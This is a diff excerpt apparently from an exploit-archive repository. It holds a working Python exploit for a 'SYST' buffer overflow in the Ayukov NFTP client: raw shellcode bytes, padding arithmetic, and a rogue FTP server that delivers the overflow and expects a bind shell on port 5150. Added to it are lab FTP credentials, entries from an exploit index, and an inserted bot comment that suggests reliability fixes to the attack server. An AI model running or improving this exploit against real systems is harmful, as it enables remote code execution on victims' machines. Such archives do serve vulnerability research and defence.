"\xd5\x0e\xd3\xb8\xe4\xc0\x26\xb9\x21\x3c\xca\xeb\xfa\x4a\x79"
|
||||
"\x1b\x8e\x07\x42\x90\xdc\x86\xc2\x45\x94\xa9\xe3\xd8\xae\xf3"
|
||||
"\x23\xdb\x63\x88\x6d\xc3\x60\xb5\x24\x78\x52\x41\xb7\xa8\xaa"
|
||||
"\xaa\x14\x95\x02\x59\x64\xd2\xa5\x82\x13\x2a\xd6\x3f\x24\xe9"
|
||||
"\xa4\x9b\xa1\xe9\x0f\x6f\x11\xd5\xae\xbc\xc4\x9e\xbd\x09\x82"
|
||||
"\xf8\xa1\x8c\x47\x73\xdd\x05\x66\x53\x57\x5d\x4d\x77\x33\x05"
|
||||
"\xec\x2e\x99\xe8\x11\x30\x42\x54\xb4\x3b\x6f\x81\xc5\x66\xf8"
|
||||
"\x66\xe4\x98\xf8\xe0\x7f\xeb\xca\xaf\x2b\x63\x67\x27\xf2\x74"
|
||||
"\x88\x12\x42\xea\x77\x9d\xb3\x23\xbc\xc9\xe3\x5b\x15\x72\x68"
|
||||
"\x9b\x9a\xa7\x05\x93\x3d\x18\x38\x5e\xfd\xc8\xfc\xf0\x96\x02"
|
||||
"\xf3\x2f\x86\x2c\xd9\x58\x2f\xd1\xe2\x72\xae\x5c\x04\x10\xde"
|
||||
"\x08\x9e\x8c\x1c\x6f\x17\x2b\x5e\x45\x0f\xdb\x17\x8f\x88\xe4"
|
||||
"\xa7\x85\xbe\x72\x2c\xca\x7a\x63\x33\xc7\x2a\xf4\xa4\x9d\xba"
|
||||
"\xb7\x55\xa1\x96\x2f\xf5\x30\x7d\xaf\x70\x29\x2a\xf8\xd5\x9f"
|
||||
"\x23\x6c\xc8\x86\x9d\x92\x11\x5e\xe5\x16\xce\xa3\xe8\x97\x83"
|
||||
"\x98\xce\x87\x5d\x20\x4b\xf3\x31\x77\x05\xad\xf7\x21\xe7\x07"
|
||||
"\xae\x9e\xa1\xcf\x37\xed\x71\x89\x37\x38\x04\x75\x89\x95\x51"
|
||||
"\x8a\x26\x72\x56\xf3\x5a\xe2\x99\x2e\xdf\x12\xd0\x72\x76\xbb"
|
||||
"\xbd\xe7\xca\xa6\x3d\xd2\x09\xdf\xbd\xd6\xf1\x24\xdd\x93\xf4"
|
||||
"\x61\x59\x48\x85\xfa\x0c\x6e\x3a\xfa\x04"
|
||||
) # 355
|
||||
sploit += "C" * (10000 - 4116 - 4 - 12 - 1693 - 13 - 8 - 0x22 - 355 - 20)
|
||||
|
||||
|
||||
cases = {
|
||||
"USER": "331 user OK. Pass required",
|
||||
"PASS": "230 OK, current directory is /",
|
||||
# "SYST": "215 UNIX Type: L8",
|
||||
|
||||
"SYST": sploit, # CRASH! in response to SYST cmd/request, w/"A"*5000, 41414141 in EIP and EBP
|
||||
|
||||
"TYPE": "200 TYPE is whatever was just requested... \"yeah, ok\"",
|
||||
"SITE UMASK": "500 SITE UMASK is an unknown extension",
|
||||
"CWD": "250 OK, current directory whatever you think it is",
|
||||
"PORT": "200 PORT command successful",
|
||||
"PASV": "227 Entering PASV mode",
|
||||
"LIST": "150 Connecting to whatever port.\r\n226 ASCII\r\n226 Options: -a -l\r\n226 3 matches total"
|
||||
}
|
||||
|
||||
|
||||
sx = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
|
||||
sx.bind(("192.168.56.181",21))
|
||||
sx.listen(5)
|
||||
print("[.] Standing up HostileFTPd v0.0 alpha, port 21")
|
||||
cx,addr = sx.accept()
|
||||
print("[!] Connection received from %s" % str(addr))
|
||||
cx.send("220 HostileFTPd v0.0 alpha !\r\n")
|
||||
notified = 0
|
||||
while True:
|
||||
req = cx.recv(1024)
|
||||
for key, resp in cases.items():
|
||||
if key in req:
|
||||
cx.send(resp + "\r\n")
|
||||
if "SITE UMASK" in req and notified == 0:
|
||||
print("[!] Buffer sent. Bind shell on client's port 5150?")
|
||||
notified = 1
|
||||
if "PASV" in req:
|
||||
justpause = raw_input("[.] PASV received. Pausing recv buffer")
|
||||
|
||||
|
||||
NOTES="""\
|
||||
### followed TCP stream in normal client connect to ftp server
|
||||
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
|
||||
220-You are user number 1 of 50 allowed.
|
||||
220-Local time is now 13:47. Server port: 21.
|
||||
220-This is a private system - No anonymous login
|
||||
220-IPv6 connections are also welcome on this server.
|
||||
220 You will be disconnected after 15 minutes of inactivity.
|
||||
USER bozo
|
||||
331 User bozo OK. Password required
|
||||
PASS theclown
|
||||
230-User bozo has group access to: 1003
|
||||
230 OK. Current directory is /
|
||||
SYST
|
||||
215 UNIX Type: L8
|
||||
TYPE I
|
||||
200 TYPE is now 8-bit binary
|
||||
SITE UMASK 022
|
||||
500 SITE UMASK is an unknown extension
|
||||
CWD /
|
||||
250 OK. Current directory is /
|
||||
PASV
|
||||
227 Entering Passive Mode (192,168,56,181,183,29)
|
||||
LIST -a
|
||||
150 Accepted data connection
|
||||
226-ASCII
|
||||
226-Options: -a -l
|
||||
226 3 matches total
|
||||
"""
|
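Review bot: The `while True:` loop in the server section never checks the result of `cx.recv(1024)`; once the client closes the connection `recv` returns an empty string, every `key in req` test is false, and the loop spins at full CPU forever. Add `if not req: break` directly after the `recv` line, and close `cx` and `sx` after the loop (or wrap the accept/loop in `try/finally`). Matching by iterating `cases.items()` with substring tests also means a request that contains more than one key gets several replies in dictionary order, which on Python 2 is not insertion order; testing only the leading command token of `req` would make the dispatch deterministic.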
|
@ -6584,6 +6584,7 @@ id,file,description,date,author,type,platform,port
|
|||
47552,exploits/multiple/dos/47552.txt,"WebKit - Universal XSS in HTMLFrameElementBase::isURLAllowed",2019-10-28,"Google Security Research",dos,multiple,
|
||||
47563,exploits/windows/dos/47563.py,"WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Denial of Service",2019-10-30,"Nithoshitha S",dos,windows,
|
||||
47565,exploits/multiple/dos/47565.txt,"JavaScriptCore - GetterSetter Type Confusion During DFG Compilation",2019-10-30,"Google Security Research",dos,multiple,
|
||||
47578,exploits/macos/dos/47578.c,"Apple macOS 10.15.1 - Denial of Service (PoC)",2019-11-04,08Tc3wBB,dos,macos,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
|
@ -10741,6 +10742,10 @@ id,file,description,date,author,type,platform,port
|
|||
47556,exploits/windows/local/47556.txt,"Intelligent Security System SecurOS Enterprise 10.2 - 'SecurosCtrlService' Unquoted Service Path",2019-10-29,"Alberto Vargas",local,windows,
|
||||
47568,exploits/windows/local/47568.py,"WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Buffer OverFlow (SEH)",2019-10-31,4ll4u,local,windows,
|
||||
47570,exploits/windows/local/47570.txt,"OpenVPN Private Tunnel 2.8.4 - 'ovpnagent' Unquoted Service Path",2019-11-01,"Sainadh Jamalpur",local,windows,
|
||||
47574,exploits/windows/local/47574.py,"Aida64 6.10.5200 - Buffer Overflow (SEH)",2019-11-04,daejinoh,local,windows,
|
||||
47575,exploits/windows/local/47575.txt,"OpenVPN Connect 3.0.0.272 - 'agent_ovpnconnect' Unquoted Service Path",2019-11-04,"Luis Martínez",local,windows,
|
||||
47577,exploits/windows/local/47577.txt,"Launch Manager 6.1.7600.16385 - 'DsiWMIService' Unquoted Service Path",2019-11-04,"Gustavo Briseño",local,windows,
|
||||
47580,exploits/linux/local/47580.rb,"Micro Focus (HPE) Data Protector - SUID Privilege Escalation (Metasploit)",2019-11-04,Metasploit,local,linux,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -17748,6 +17753,7 @@ id,file,description,date,author,type,platform,port
|
|||
47559,exploits/windows/remote/47559.py,"Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass",2019-10-29,"Thomas Zuk",remote,windows,
|
||||
47566,exploits/hardware/remote/47566.cpp,"MikroTik RouterOS 6.45.6 - DNS Cache Poisoning",2019-10-31,"Jacob Baines",remote,hardware,
|
||||
47573,exploits/multiple/remote/47573.rb,"Nostromo - Directory Traversal Remote Command Execution (Metasploit)",2019-11-01,Metasploit,remote,multiple,
|
||||
47576,exploits/windows/remote/47576.py,"Ayukov NFTP client 1.71 - 'SYST' Buffer Overflow",2019-11-04,SYANiDE,remote,windows,
|
||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
|